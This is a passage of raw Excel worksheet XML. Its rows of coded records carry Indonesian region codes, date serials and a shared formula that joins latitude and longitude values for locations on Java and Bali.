      <c r="T2885" t="s">
        <v>33</v>
      </c>
      <c r="U2885" s="5">
        <v>10676962</v>
      </c>
      <c r="V2885" s="5" t="s">
        <v>17045</v>
      </c>
      <c r="W2885" s="5">
        <v>-615408</v>
      </c>
      <c r="X2885" t="s">
        <v>20784</v>
      </c>
      <c r="Y2885" t="str">
        <f t="shared" si="45"/>
        <v>-6.15408,106.76962</v>
      </c>
    </row>
    <row r="2886" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2886">
        <v>232984</v>
      </c>
      <c r="B2886" s="1">
        <v>44234</v>
      </c>
      <c r="C2886" s="2">
        <v>0.11944444444444445</v>
      </c>
      <c r="D2886" t="s">
        <v>2648</v>
      </c>
      <c r="E2886" t="s">
        <v>23</v>
      </c>
      <c r="G2886" t="s">
        <v>9774</v>
      </c>
      <c r="H2886" t="s">
        <v>26</v>
      </c>
      <c r="J2886" t="s">
        <v>9775</v>
      </c>
      <c r="L2886" t="s">
        <v>9776</v>
      </c>
      <c r="M2886">
        <v>3172060001</v>
      </c>
      <c r="N2886">
        <v>3172060</v>
      </c>
      <c r="O2886">
        <v>3172</v>
      </c>
      <c r="P2886">
        <v>31</v>
      </c>
      <c r="Q2886" t="s">
        <v>309</v>
      </c>
      <c r="R2886" t="s">
        <v>48</v>
      </c>
      <c r="S2886" t="s">
        <v>49</v>
      </c>
      <c r="T2886" t="s">
        <v>33</v>
      </c>
      <c r="U2886" s="5">
        <v>10686590</v>
      </c>
      <c r="V2886" s="5" t="s">
        <v>17046</v>
      </c>
      <c r="W2886" s="5">
        <v>-623217</v>
      </c>
      <c r="X2886" t="s">
        <v>20785</v>
      </c>
      <c r="Y2886" t="str">
        <f t="shared" si="45"/>
        <v>-6.23217,106.86590</v>
      </c>
    </row>
    <row r="2887" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2887">
        <v>233075</v>
      </c>
      <c r="B2887" s="1">
        <v>44234</v>
      </c>
      <c r="C2887" s="2">
        <v>0.14402777777777778</v>
      </c>
      <c r="D2887" t="s">
        <v>22</v>
      </c>
      <c r="E2887" t="s">
        <v>23</v>
      </c>
      <c r="F2887" t="s">
        <v>9777</v>
      </c>
      <c r="H2887" t="s">
        <v>26</v>
      </c>
      <c r="I2887" t="s">
        <v>386</v>
      </c>
      <c r="J2887" t="s">
        <v>9605</v>
      </c>
      <c r="L2887" t="s">
        <v>9778</v>
      </c>
      <c r="M2887">
        <v>3374090013</v>
      </c>
      <c r="N2887">
        <v>3374090</v>
      </c>
      <c r="O2887">
        <v>3374</v>
      </c>
      <c r="P2887">
        <v>33</v>
      </c>
      <c r="Q2887" t="s">
        <v>1361</v>
      </c>
      <c r="R2887" t="s">
        <v>1362</v>
      </c>
      <c r="S2887" t="s">
        <v>1334</v>
      </c>
      <c r="T2887" t="s">
        <v>1134</v>
      </c>
      <c r="U2887" s="5">
        <v>11045380</v>
      </c>
      <c r="V2887" s="5" t="s">
        <v>17047</v>
      </c>
      <c r="W2887" s="5">
        <v>-695677</v>
      </c>
      <c r="X2887" t="s">
        <v>20786</v>
      </c>
      <c r="Y2887" t="str">
        <f t="shared" si="45"/>
        <v>-6.95677,110.45380</v>
      </c>
    </row>
    <row r="2888" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2888">
        <v>233080</v>
      </c>
      <c r="B2888" s="1">
        <v>44234</v>
      </c>
      <c r="C2888" s="2">
        <v>0.14583333333333334</v>
      </c>
      <c r="D2888" t="s">
        <v>2648</v>
      </c>
      <c r="E2888" t="s">
        <v>23</v>
      </c>
      <c r="G2888" t="s">
        <v>9779</v>
      </c>
      <c r="H2888" t="s">
        <v>26</v>
      </c>
      <c r="J2888" t="s">
        <v>2683</v>
      </c>
      <c r="L2888" t="s">
        <v>9780</v>
      </c>
      <c r="M2888">
        <v>3172070002</v>
      </c>
      <c r="N2888">
        <v>3172070</v>
      </c>
      <c r="O2888">
        <v>3172</v>
      </c>
      <c r="P2888">
        <v>31</v>
      </c>
      <c r="Q2888" t="s">
        <v>128</v>
      </c>
      <c r="R2888" t="s">
        <v>128</v>
      </c>
      <c r="S2888" t="s">
        <v>49</v>
      </c>
      <c r="T2888" t="s">
        <v>33</v>
      </c>
      <c r="U2888" s="5">
        <v>10691531</v>
      </c>
      <c r="V2888" s="5" t="s">
        <v>17048</v>
      </c>
      <c r="W2888" s="5">
        <v>-624667</v>
      </c>
      <c r="X2888" t="s">
        <v>20787</v>
      </c>
      <c r="Y2888" t="str">
        <f t="shared" si="45"/>
        <v>-6.24667,106.91531</v>
      </c>
    </row>
    <row r="2889" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2889">
        <v>233309</v>
      </c>
      <c r="B2889" s="1">
        <v>44234</v>
      </c>
      <c r="C2889" s="2">
        <v>0.19375000000000001</v>
      </c>
      <c r="D2889" t="s">
        <v>2648</v>
      </c>
      <c r="E2889" t="s">
        <v>23</v>
      </c>
      <c r="G2889" t="s">
        <v>9781</v>
      </c>
      <c r="H2889" t="s">
        <v>26</v>
      </c>
      <c r="J2889" t="s">
        <v>3562</v>
      </c>
      <c r="L2889" t="s">
        <v>9782</v>
      </c>
      <c r="M2889">
        <v>3172080007</v>
      </c>
      <c r="N2889">
        <v>3172080</v>
      </c>
      <c r="O2889">
        <v>3172</v>
      </c>
      <c r="P2889">
        <v>31</v>
      </c>
      <c r="Q2889" t="s">
        <v>2307</v>
      </c>
      <c r="R2889" t="s">
        <v>141</v>
      </c>
      <c r="S2889" t="s">
        <v>49</v>
      </c>
      <c r="T2889" t="s">
        <v>33</v>
      </c>
      <c r="U2889" s="5">
        <v>10692783</v>
      </c>
      <c r="V2889" s="5" t="s">
        <v>17049</v>
      </c>
      <c r="W2889" s="5">
        <v>-618426</v>
      </c>
      <c r="X2889" t="s">
        <v>20788</v>
      </c>
      <c r="Y2889" t="str">
        <f t="shared" si="45"/>
        <v>-6.18426,106.92783</v>
      </c>
    </row>
    <row r="2890" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2890">
        <v>233368</v>
      </c>
      <c r="B2890" s="1">
        <v>44234</v>
      </c>
      <c r="C2890" s="2">
        <v>0.20637731481481481</v>
      </c>
      <c r="D2890" t="s">
        <v>22</v>
      </c>
      <c r="E2890" t="s">
        <v>23</v>
      </c>
      <c r="F2890" t="s">
        <v>9783</v>
      </c>
      <c r="H2890" t="s">
        <v>26</v>
      </c>
      <c r="I2890" t="s">
        <v>137</v>
      </c>
      <c r="J2890" t="s">
        <v>2622</v>
      </c>
      <c r="L2890" t="s">
        <v>9784</v>
      </c>
      <c r="M2890">
        <v>3506010014</v>
      </c>
      <c r="N2890">
        <v>3506010</v>
      </c>
      <c r="O2890">
        <v>3506</v>
      </c>
      <c r="P2890">
        <v>35</v>
      </c>
      <c r="Q2890" t="s">
        <v>1544</v>
      </c>
      <c r="R2890" t="s">
        <v>1544</v>
      </c>
      <c r="S2890" t="s">
        <v>8365</v>
      </c>
      <c r="T2890" t="s">
        <v>1221</v>
      </c>
      <c r="U2890" s="5">
        <v>11195729</v>
      </c>
      <c r="V2890" s="5" t="s">
        <v>17050</v>
      </c>
      <c r="W2890" s="5">
        <v>-788944</v>
      </c>
      <c r="X2890" t="s">
        <v>20789</v>
      </c>
      <c r="Y2890" t="str">
        <f t="shared" si="45"/>
        <v>-7.88944,111.95729</v>
      </c>
    </row>
    <row r="2891" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2891">
        <v>233761</v>
      </c>
      <c r="B2891" s="1">
        <v>44234</v>
      </c>
      <c r="C2891" s="2">
        <v>0.28765046296296298</v>
      </c>
      <c r="D2891" t="s">
        <v>22</v>
      </c>
      <c r="E2891" t="s">
        <v>23</v>
      </c>
      <c r="F2891" t="s">
        <v>9785</v>
      </c>
      <c r="H2891" t="s">
        <v>26</v>
      </c>
      <c r="I2891" t="s">
        <v>137</v>
      </c>
      <c r="J2891" t="s">
        <v>9786</v>
      </c>
      <c r="L2891" t="s">
        <v>9787</v>
      </c>
      <c r="M2891">
        <v>3374130015</v>
      </c>
      <c r="N2891">
        <v>3374130</v>
      </c>
      <c r="O2891">
        <v>3374</v>
      </c>
      <c r="P2891">
        <v>33</v>
      </c>
      <c r="Q2891" t="s">
        <v>9788</v>
      </c>
      <c r="R2891" t="s">
        <v>9633</v>
      </c>
      <c r="S2891" t="s">
        <v>1334</v>
      </c>
      <c r="T2891" t="s">
        <v>1134</v>
      </c>
      <c r="U2891" s="5">
        <v>11041210</v>
      </c>
      <c r="V2891" s="5" t="s">
        <v>17051</v>
      </c>
      <c r="W2891" s="5">
        <v>-697574</v>
      </c>
      <c r="X2891" t="s">
        <v>20790</v>
      </c>
      <c r="Y2891" t="str">
        <f t="shared" si="45"/>
        <v>-6.97574,110.41210</v>
      </c>
    </row>
    <row r="2892" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2892">
        <v>233781</v>
      </c>
      <c r="B2892" s="1">
        <v>44234</v>
      </c>
      <c r="C2892" s="2">
        <v>0.28958333333333336</v>
      </c>
      <c r="D2892" t="s">
        <v>2648</v>
      </c>
      <c r="E2892" t="s">
        <v>23</v>
      </c>
      <c r="G2892" t="s">
        <v>9789</v>
      </c>
      <c r="H2892" t="s">
        <v>26</v>
      </c>
      <c r="J2892" t="s">
        <v>1605</v>
      </c>
      <c r="L2892" t="s">
        <v>2716</v>
      </c>
      <c r="M2892">
        <v>3174040007</v>
      </c>
      <c r="N2892">
        <v>3174040</v>
      </c>
      <c r="O2892">
        <v>3174</v>
      </c>
      <c r="P2892">
        <v>31</v>
      </c>
      <c r="Q2892" t="s">
        <v>389</v>
      </c>
      <c r="R2892" t="s">
        <v>377</v>
      </c>
      <c r="S2892" t="s">
        <v>32</v>
      </c>
      <c r="T2892" t="s">
        <v>33</v>
      </c>
      <c r="U2892" s="5">
        <v>10678825</v>
      </c>
      <c r="V2892" s="5" t="s">
        <v>15040</v>
      </c>
      <c r="W2892" s="5">
        <v>-614509</v>
      </c>
      <c r="X2892" t="s">
        <v>20791</v>
      </c>
      <c r="Y2892" t="str">
        <f t="shared" si="45"/>
        <v>-6.14509,106.78825</v>
      </c>
    </row>
    <row r="2893" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2893">
        <v>233803</v>
      </c>
      <c r="B2893" s="1">
        <v>44234</v>
      </c>
      <c r="C2893" s="2">
        <v>0.29375000000000001</v>
      </c>
      <c r="D2893" t="s">
        <v>2648</v>
      </c>
      <c r="E2893" t="s">
        <v>23</v>
      </c>
      <c r="G2893" t="s">
        <v>9790</v>
      </c>
      <c r="H2893" t="s">
        <v>26</v>
      </c>
      <c r="J2893" t="s">
        <v>629</v>
      </c>
      <c r="L2893" t="s">
        <v>6656</v>
      </c>
      <c r="M2893">
        <v>3174040007</v>
      </c>
      <c r="N2893">
        <v>3174040</v>
      </c>
      <c r="O2893">
        <v>3174</v>
      </c>
      <c r="P2893">
        <v>31</v>
      </c>
      <c r="Q2893" t="s">
        <v>389</v>
      </c>
      <c r="R2893" t="s">
        <v>377</v>
      </c>
      <c r="S2893" t="s">
        <v>32</v>
      </c>
      <c r="T2893" t="s">
        <v>33</v>
      </c>
      <c r="U2893" s="5">
        <v>10678642</v>
      </c>
      <c r="V2893" s="5" t="s">
        <v>17052</v>
      </c>
      <c r="W2893" s="5">
        <v>-614640</v>
      </c>
      <c r="X2893" t="s">
        <v>20792</v>
      </c>
      <c r="Y2893" t="str">
        <f t="shared" si="45"/>
        <v>-6.14640,106.78642</v>
      </c>
    </row>
    <row r="2894" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2894">
        <v>233835</v>
      </c>
      <c r="B2894" s="1">
        <v>44234</v>
      </c>
      <c r="C2894" s="2">
        <v>0.30098379629629629</v>
      </c>
      <c r="D2894" t="s">
        <v>22</v>
      </c>
      <c r="E2894" t="s">
        <v>23</v>
      </c>
      <c r="F2894" t="s">
        <v>9791</v>
      </c>
      <c r="G2894" t="s">
        <v>9792</v>
      </c>
      <c r="H2894" t="s">
        <v>26</v>
      </c>
      <c r="I2894" t="s">
        <v>166</v>
      </c>
      <c r="J2894" t="s">
        <v>2608</v>
      </c>
      <c r="L2894" t="s">
        <v>9793</v>
      </c>
      <c r="M2894">
        <v>3375040006</v>
      </c>
      <c r="N2894">
        <v>3375040</v>
      </c>
      <c r="O2894">
        <v>3375</v>
      </c>
      <c r="P2894">
        <v>33</v>
      </c>
      <c r="Q2894" t="s">
        <v>7385</v>
      </c>
      <c r="R2894" t="s">
        <v>7339</v>
      </c>
      <c r="S2894" t="s">
        <v>6246</v>
      </c>
      <c r="T2894" t="s">
        <v>1134</v>
      </c>
      <c r="U2894" s="5">
        <v>10967704</v>
      </c>
      <c r="V2894" s="5" t="s">
        <v>17053</v>
      </c>
      <c r="W2894" s="5">
        <v>-687315</v>
      </c>
      <c r="X2894" t="s">
        <v>20793</v>
      </c>
      <c r="Y2894" t="str">
        <f t="shared" si="45"/>
        <v>-6.87315,109.67704</v>
      </c>
    </row>
    <row r="2895" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2895">
        <v>234614</v>
      </c>
      <c r="B2895" s="1">
        <v>44234</v>
      </c>
      <c r="C2895" s="2">
        <v>0.45206018518518515</v>
      </c>
      <c r="D2895" t="s">
        <v>22</v>
      </c>
      <c r="E2895" t="s">
        <v>23</v>
      </c>
      <c r="F2895" t="s">
        <v>9794</v>
      </c>
      <c r="H2895" t="s">
        <v>26</v>
      </c>
      <c r="I2895" t="s">
        <v>1758</v>
      </c>
      <c r="J2895" t="s">
        <v>2627</v>
      </c>
      <c r="L2895" t="s">
        <v>9795</v>
      </c>
      <c r="M2895">
        <v>3213100007</v>
      </c>
      <c r="N2895">
        <v>3213100</v>
      </c>
      <c r="O2895">
        <v>3213</v>
      </c>
      <c r="P2895">
        <v>32</v>
      </c>
      <c r="Q2895" t="s">
        <v>9796</v>
      </c>
      <c r="R2895" t="s">
        <v>2146</v>
      </c>
      <c r="S2895" t="s">
        <v>5179</v>
      </c>
      <c r="T2895" t="s">
        <v>42</v>
      </c>
      <c r="U2895" s="5">
        <v>10763240</v>
      </c>
      <c r="V2895" s="5" t="s">
        <v>17054</v>
      </c>
      <c r="W2895" s="5">
        <v>-641863</v>
      </c>
      <c r="X2895" t="s">
        <v>20794</v>
      </c>
      <c r="Y2895" t="str">
        <f t="shared" si="45"/>
        <v>-6.41863,107.63240</v>
      </c>
    </row>
    <row r="2896" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2896">
        <v>234955</v>
      </c>
      <c r="B2896" s="1">
        <v>44234</v>
      </c>
      <c r="C2896" s="2">
        <v>0.52135416666666667</v>
      </c>
      <c r="D2896" t="s">
        <v>22</v>
      </c>
      <c r="E2896" t="s">
        <v>23</v>
      </c>
      <c r="F2896" t="s">
        <v>9797</v>
      </c>
      <c r="G2896" t="s">
        <v>9798</v>
      </c>
      <c r="H2896" t="s">
        <v>26</v>
      </c>
      <c r="I2896" t="s">
        <v>492</v>
      </c>
      <c r="J2896" t="s">
        <v>2627</v>
      </c>
      <c r="L2896" t="s">
        <v>9799</v>
      </c>
      <c r="M2896">
        <v>3275010012</v>
      </c>
      <c r="N2896">
        <v>3275010</v>
      </c>
      <c r="O2896">
        <v>3275</v>
      </c>
      <c r="P2896">
        <v>32</v>
      </c>
      <c r="Q2896" t="s">
        <v>2322</v>
      </c>
      <c r="R2896" t="s">
        <v>287</v>
      </c>
      <c r="S2896" t="s">
        <v>41</v>
      </c>
      <c r="T2896" t="s">
        <v>42</v>
      </c>
      <c r="U2896" s="5">
        <v>10692720</v>
      </c>
      <c r="V2896" s="5" t="s">
        <v>17055</v>
      </c>
      <c r="W2896" s="5">
        <v>-626675</v>
      </c>
      <c r="X2896" t="s">
        <v>20795</v>
      </c>
      <c r="Y2896" t="str">
        <f t="shared" si="45"/>
        <v>-6.26675,106.92720</v>
      </c>
    </row>
    <row r="2897" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2897">
        <v>234990</v>
      </c>
      <c r="B2897" s="1">
        <v>44234</v>
      </c>
      <c r="C2897" s="2">
        <v>0.52621527777777777</v>
      </c>
      <c r="D2897" t="s">
        <v>22</v>
      </c>
      <c r="E2897" t="s">
        <v>23</v>
      </c>
      <c r="F2897" t="s">
        <v>9800</v>
      </c>
      <c r="H2897" t="s">
        <v>26</v>
      </c>
      <c r="I2897" t="s">
        <v>137</v>
      </c>
      <c r="J2897" t="s">
        <v>7277</v>
      </c>
      <c r="L2897" t="s">
        <v>9801</v>
      </c>
      <c r="M2897">
        <v>5171030005</v>
      </c>
      <c r="N2897">
        <v>5171030</v>
      </c>
      <c r="O2897">
        <v>5171</v>
      </c>
      <c r="P2897">
        <v>51</v>
      </c>
      <c r="Q2897" t="s">
        <v>9802</v>
      </c>
      <c r="R2897" t="s">
        <v>9803</v>
      </c>
      <c r="S2897" t="s">
        <v>9135</v>
      </c>
      <c r="T2897" t="s">
        <v>7282</v>
      </c>
      <c r="U2897" s="5">
        <v>11521984</v>
      </c>
      <c r="V2897" s="5" t="s">
        <v>17056</v>
      </c>
      <c r="W2897" s="5">
        <v>-866968</v>
      </c>
      <c r="X2897" t="s">
        <v>20796</v>
      </c>
      <c r="Y2897" t="str">
        <f t="shared" si="45"/>
        <v>-8.66968,115.21984</v>
      </c>
    </row>
    <row r="2898" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2898">
        <v>235045</v>
      </c>
      <c r="B2898" s="1">
        <v>44234</v>
      </c>
      <c r="C2898" s="2">
        <v>0.53888888888888886</v>
      </c>
      <c r="D2898" t="s">
        <v>2648</v>
      </c>
      <c r="E2898" t="s">
        <v>23</v>
      </c>
      <c r="G2898" t="s">
        <v>9804</v>
      </c>
      <c r="H2898" t="s">
        <v>26</v>
      </c>
      <c r="J2898" t="s">
        <v>404</v>
      </c>
      <c r="L2898" t="s">
        <v>2716</v>
      </c>
      <c r="M2898">
        <v>3174020005</v>
      </c>
      <c r="N2898">
        <v>3174020</v>
      </c>
      <c r="O2898">
        <v>3174</v>
      </c>
      <c r="P2898">
        <v>31</v>
      </c>
      <c r="Q2898" t="s">
        <v>30</v>
      </c>
      <c r="R2898" t="s">
        <v>31</v>
      </c>
      <c r="S2898" t="s">
        <v>32</v>
      </c>
      <c r="T2898" t="s">
        <v>33</v>
      </c>
      <c r="U2898" s="5">
        <v>10677081</v>
      </c>
      <c r="V2898" s="5" t="s">
        <v>17057</v>
      </c>
      <c r="W2898" s="5">
        <v>-616649</v>
      </c>
      <c r="X2898" t="s">
        <v>20797</v>
      </c>
      <c r="Y2898" t="str">
        <f t="shared" si="45"/>
        <v>-6.16649,106.77081</v>
      </c>
    </row>
    <row r="2899" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2899">
        <v>235132</v>
      </c>
      <c r="B2899" s="1">
        <v>44234</v>
      </c>
      <c r="C2899" s="2">
        <v>0.55659722222222219</v>
      </c>
      <c r="D2899" t="s">
        <v>22</v>
      </c>
      <c r="E2899" t="s">
        <v>23</v>
      </c>
      <c r="F2899" t="s">
        <v>9805</v>
      </c>
      <c r="H2899" t="s">
        <v>26</v>
      </c>
      <c r="I2899" t="s">
        <v>193</v>
      </c>
      <c r="J2899" t="s">
        <v>2627</v>
      </c>
      <c r="M2899">
        <v>3215050013</v>
      </c>
      <c r="N2899">
        <v>3215050</v>
      </c>
      <c r="O2899">
        <v>3215</v>
      </c>
      <c r="P2899">
        <v>32</v>
      </c>
      <c r="Q2899" t="s">
        <v>9806</v>
      </c>
      <c r="R2899" t="s">
        <v>9807</v>
      </c>
      <c r="S2899" t="s">
        <v>3979</v>
      </c>
      <c r="T2899" t="s">
        <v>42</v>
      </c>
      <c r="U2899" s="5">
        <v>10743314</v>
      </c>
      <c r="V2899" s="5" t="s">
        <v>17058</v>
      </c>
      <c r="W2899" s="5">
        <v>-639271</v>
      </c>
      <c r="X2899" t="s">
        <v>20798</v>
      </c>
      <c r="Y2899" t="str">
        <f t="shared" si="45"/>
        <v>-6.39271,107.43314</v>
      </c>
    </row>
    <row r="2900" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2900">
        <v>236141</v>
      </c>
      <c r="B2900" s="1">
        <v>44234</v>
      </c>
      <c r="C2900" s="2">
        <v>0.74925925925925929</v>
      </c>
      <c r="D2900" t="s">
        <v>22</v>
      </c>
      <c r="E2900" t="s">
        <v>23</v>
      </c>
      <c r="F2900" t="s">
        <v>9808</v>
      </c>
      <c r="H2900" t="s">
        <v>26</v>
      </c>
      <c r="I2900" t="s">
        <v>27</v>
      </c>
      <c r="J2900" t="s">
        <v>9809</v>
      </c>
      <c r="L2900" t="s">
        <v>9810</v>
      </c>
      <c r="M2900">
        <v>3374100005</v>
      </c>
      <c r="N2900">
        <v>3374100</v>
      </c>
      <c r="O2900">
        <v>3374</v>
      </c>
      <c r="P2900">
        <v>33</v>
      </c>
      <c r="Q2900" t="s">
        <v>9811</v>
      </c>
      <c r="R2900" t="s">
        <v>9608</v>
      </c>
      <c r="S2900" t="s">
        <v>1334</v>
      </c>
      <c r="T2900" t="s">
        <v>1134</v>
      </c>
      <c r="U2900" s="5">
        <v>11044875</v>
      </c>
      <c r="V2900" s="5" t="s">
        <v>17059</v>
      </c>
      <c r="W2900" s="5">
        <v>-697585</v>
      </c>
      <c r="X2900" t="s">
        <v>20799</v>
      </c>
      <c r="Y2900" t="str">
        <f t="shared" si="45"/>
        <v>-6.97585,110.44875</v>
      </c>
    </row>
    <row r="2901" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2901">
        <v>236333</v>
      </c>
      <c r="B2901" s="1">
        <v>44234</v>
      </c>
      <c r="C2901" s="2">
        <v>0.78228009259259268</v>
      </c>
      <c r="D2901" t="s">
        <v>22</v>
      </c>
      <c r="E2901" t="s">
        <v>23</v>
      </c>
      <c r="F2901" t="s">
        <v>9812</v>
      </c>
      <c r="G2901" t="s">
        <v>9813</v>
      </c>
      <c r="H2901" t="s">
        <v>26</v>
      </c>
      <c r="I2901" t="s">
        <v>137</v>
      </c>
      <c r="J2901" t="s">
        <v>2627</v>
      </c>
      <c r="L2901" t="s">
        <v>9814</v>
      </c>
      <c r="M2901">
        <v>3212041006</v>
      </c>
      <c r="N2901">
        <v>3212041</v>
      </c>
      <c r="O2901">
        <v>3212</v>
      </c>
      <c r="P2901">
        <v>32</v>
      </c>
      <c r="Q2901" t="s">
        <v>9815</v>
      </c>
      <c r="R2901" t="s">
        <v>9816</v>
      </c>
      <c r="S2901" t="s">
        <v>8471</v>
      </c>
      <c r="T2901" t="s">
        <v>42</v>
      </c>
      <c r="U2901" s="5">
        <v>10815898</v>
      </c>
      <c r="V2901" s="5" t="s">
        <v>17060</v>
      </c>
      <c r="W2901" s="5">
        <v>-647073</v>
      </c>
      <c r="X2901" t="s">
        <v>20800</v>
      </c>
      <c r="Y2901" t="str">
        <f t="shared" si="45"/>
        <v>-6.47073,108.15898</v>
      </c>
    </row>
    <row r="2902" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2902">
        <v>236640</v>
      </c>
      <c r="B2902" s="1">
        <v>44234</v>
      </c>
      <c r="C2902" s="2">
        <v>0.84221064814814817</v>
      </c>
      <c r="D2902" t="s">
        <v>22</v>
      </c>
      <c r="E2902" t="s">
        <v>23</v>
      </c>
      <c r="F2902" t="s">
        <v>9817</v>
      </c>
      <c r="H2902" t="s">
        <v>26</v>
      </c>
      <c r="I2902" t="s">
        <v>8605</v>
      </c>
      <c r="J2902" t="s">
        <v>2627</v>
      </c>
      <c r="L2902" t="s">
        <v>9818</v>
      </c>
      <c r="M2902">
        <v>3212010011</v>
      </c>
      <c r="N2902">
        <v>3212010</v>
      </c>
      <c r="O2902">
        <v>3212</v>
      </c>
      <c r="P2902">
        <v>32</v>
      </c>
      <c r="Q2902" t="s">
        <v>9819</v>
      </c>
      <c r="R2902" t="s">
        <v>9820</v>
      </c>
      <c r="S2902" t="s">
        <v>8471</v>
      </c>
      <c r="T2902" t="s">
        <v>42</v>
      </c>
      <c r="U2902" s="5">
        <v>10790362</v>
      </c>
      <c r="V2902" s="5" t="s">
        <v>17061</v>
      </c>
      <c r="W2902" s="5">
        <v>-645889</v>
      </c>
      <c r="X2902" t="s">
        <v>20801</v>
      </c>
      <c r="Y2902" t="str">
        <f t="shared" si="45"/>
        <v>-6.45889,107.90362</v>
      </c>
    </row>
    <row r="2903" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2903">
        <v>237418</v>
      </c>
      <c r="B2903" s="1">
        <v>44234</v>
      </c>
      <c r="C2903" s="2">
        <v>0.99652777777777779</v>
      </c>
      <c r="D2903" t="s">
        <v>2648</v>
      </c>
      <c r="E2903" t="s">
        <v>23</v>
      </c>
      <c r="G2903" t="s">
        <v>9821</v>
      </c>
      <c r="H2903" t="s">
        <v>26</v>
      </c>
      <c r="J2903" t="s">
        <v>9822</v>
      </c>
      <c r="L2903" t="s">
        <v>9823</v>
      </c>
      <c r="M2903">
        <v>3173070003</v>
      </c>
      <c r="N2903">
        <v>3173070</v>
      </c>
      <c r="O2903">
        <v>3173</v>
      </c>
      <c r="P2903">
        <v>31</v>
      </c>
      <c r="Q2903" t="s">
        <v>520</v>
      </c>
      <c r="R2903" t="s">
        <v>323</v>
      </c>
      <c r="S2903" t="s">
        <v>62</v>
      </c>
      <c r="T2903" t="s">
        <v>33</v>
      </c>
      <c r="U2903" s="5">
        <v>10683351</v>
      </c>
      <c r="V2903" s="5" t="s">
        <v>17062</v>
      </c>
      <c r="W2903" s="5">
        <v>-615600</v>
      </c>
      <c r="X2903" t="s">
        <v>20802</v>
      </c>
      <c r="Y2903" t="str">
        <f t="shared" si="45"/>
        <v>-6.15600,106.83351</v>
      </c>
    </row>
    <row r="2904" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2904">
        <v>237430</v>
      </c>
      <c r="B2904" s="1">
        <v>44234</v>
      </c>
      <c r="C2904" s="2">
        <v>0.99722222222222223</v>
      </c>
      <c r="D2904" t="s">
        <v>2648</v>
      </c>
      <c r="E2904" t="s">
        <v>23</v>
      </c>
      <c r="G2904" t="s">
        <v>9824</v>
      </c>
      <c r="H2904" t="s">
        <v>26</v>
      </c>
      <c r="J2904" t="s">
        <v>9822</v>
      </c>
      <c r="L2904" t="s">
        <v>9825</v>
      </c>
      <c r="M2904">
        <v>3173070003</v>
      </c>
      <c r="N2904">
        <v>3173070</v>
      </c>
      <c r="O2904">
        <v>3173</v>
      </c>
      <c r="P2904">
        <v>31</v>
      </c>
      <c r="Q2904" t="s">
        <v>520</v>
      </c>
      <c r="R2904" t="s">
        <v>323</v>
      </c>
      <c r="S2904" t="s">
        <v>62</v>
      </c>
      <c r="T2904" t="s">
        <v>33</v>
      </c>
      <c r="U2904" s="5">
        <v>10683351</v>
      </c>
      <c r="V2904" s="5" t="s">
        <v>17062</v>
      </c>
      <c r="W2904" s="5">
        <v>-615600</v>
      </c>
      <c r="X2904" t="s">
        <v>20802</v>
      </c>
      <c r="Y2904" t="str">
        <f t="shared" si="45"/>
        <v>-6.15600,106.83351</v>
      </c>
    </row>
    <row r="2905" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2905">
        <v>237432</v>
      </c>
      <c r="B2905" s="1">
        <v>44234</v>
      </c>
      <c r="C2905" s="2">
        <v>0.99791666666666667</v>
      </c>
      <c r="D2905" t="s">
        <v>2648</v>
      </c>
      <c r="E2905" t="s">
        <v>23</v>
      </c>
      <c r="G2905" t="s">
        <v>9826</v>
      </c>
      <c r="H2905" t="s">
        <v>26</v>
      </c>
      <c r="J2905" t="s">
        <v>9827</v>
      </c>
      <c r="L2905" t="s">
        <v>9825</v>
      </c>
      <c r="M2905">
        <v>3173070003</v>
      </c>
      <c r="N2905">
        <v>3173070</v>
      </c>
      <c r="O2905">
        <v>3173</v>
      </c>
      <c r="P2905">
        <v>31</v>
      </c>
      <c r="Q2905" t="s">
        <v>520</v>
      </c>
      <c r="R2905" t="s">
        <v>323</v>
      </c>
      <c r="S2905" t="s">
        <v>62</v>
      </c>
      <c r="T2905" t="s">
        <v>33</v>
      </c>
      <c r="U2905" s="5">
        <v>10683321</v>
      </c>
      <c r="V2905" s="5" t="s">
        <v>17063</v>
      </c>
      <c r="W2905" s="5">
        <v>-615626</v>
      </c>
      <c r="X2905" t="s">
        <v>20803</v>
      </c>
      <c r="Y2905" t="str">
        <f t="shared" si="45"/>
        <v>-6.15626,106.83321</v>
      </c>
    </row>
    <row r="2906" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2906">
        <v>237433</v>
      </c>
      <c r="B2906" s="1">
        <v>44235</v>
      </c>
      <c r="C2906" s="2">
        <v>0</v>
      </c>
      <c r="D2906" t="s">
        <v>2648</v>
      </c>
      <c r="E2906" t="s">
        <v>23</v>
      </c>
      <c r="G2906" t="s">
        <v>9828</v>
      </c>
      <c r="H2906" t="s">
        <v>26</v>
      </c>
      <c r="J2906" t="s">
        <v>2036</v>
      </c>
      <c r="L2906" t="s">
        <v>9829</v>
      </c>
      <c r="M2906">
        <v>3173070001</v>
      </c>
      <c r="N2906">
        <v>3173070</v>
      </c>
      <c r="O2906">
        <v>3173</v>
      </c>
      <c r="P2906">
        <v>31</v>
      </c>
      <c r="Q2906" t="s">
        <v>322</v>
      </c>
      <c r="R2906" t="s">
        <v>323</v>
      </c>
      <c r="S2906" t="s">
        <v>62</v>
      </c>
      <c r="T2906" t="s">
        <v>33</v>
      </c>
      <c r="U2906" s="5">
        <v>10683421</v>
      </c>
      <c r="V2906" s="5" t="s">
        <v>17064</v>
      </c>
      <c r="W2906" s="5">
        <v>-615816</v>
      </c>
      <c r="X2906" t="s">
        <v>20804</v>
      </c>
      <c r="Y2906" t="str">
        <f t="shared" si="45"/>
